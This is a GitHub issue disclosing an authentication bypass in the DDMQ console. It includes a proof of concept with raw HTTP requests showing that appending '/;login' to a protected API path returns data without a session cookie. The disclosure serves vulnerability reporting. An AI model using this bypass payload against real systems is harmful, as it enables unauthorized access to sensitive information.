Skip to content

A specially crafted request may cause an authentication bypass #37

New issue
New issue
Open
Open
A specially crafted request may cause an authentication bypass#37
@gaogaostone

Description

@gaogaostone
gaogaostone
opened on Oct 10, 2024

In DDMQ console module through all the versions, a specially crafted request may cause an authentication bypass.Attackers can add “/;login” at the tail of authorization-required urls to bypass the authentication and retrieve sensitive information.

Proof of concept

Step1: we log into the system and browse the urls, such as “/carrera/api/console/sub/list”. As we log on the system and request it with cookie, it response with status 200 and SUCCESS in the response data. The normal request is as following.

GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Cookie: JSESSION_ID=7183738335349390416; carrera-console-ddmq-login-token=admin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

ddmq-1

Step 2: When we request the same request without cookie, it responses with 401(Unauthorized). Therefore, the url “/carrera/api/console/sub/list” can only be accessed by authorized users.

GET /carrera/api/console/sub/list?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

ddmq-2

Step 3: we add “/;login” at the tail of the url. The bypassed payload is as following. With the payload and without cookie, it response with status 200 and SUCCESS in the response data. We bypass the authentication with this request.

GET /carrera/api/console/sub/list/;login?curPage=1&pageSize=10&text=&clusterId=1&groupId=&consumeType=&state=&user=administration HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8080/carrera//index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

ddmq-3

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions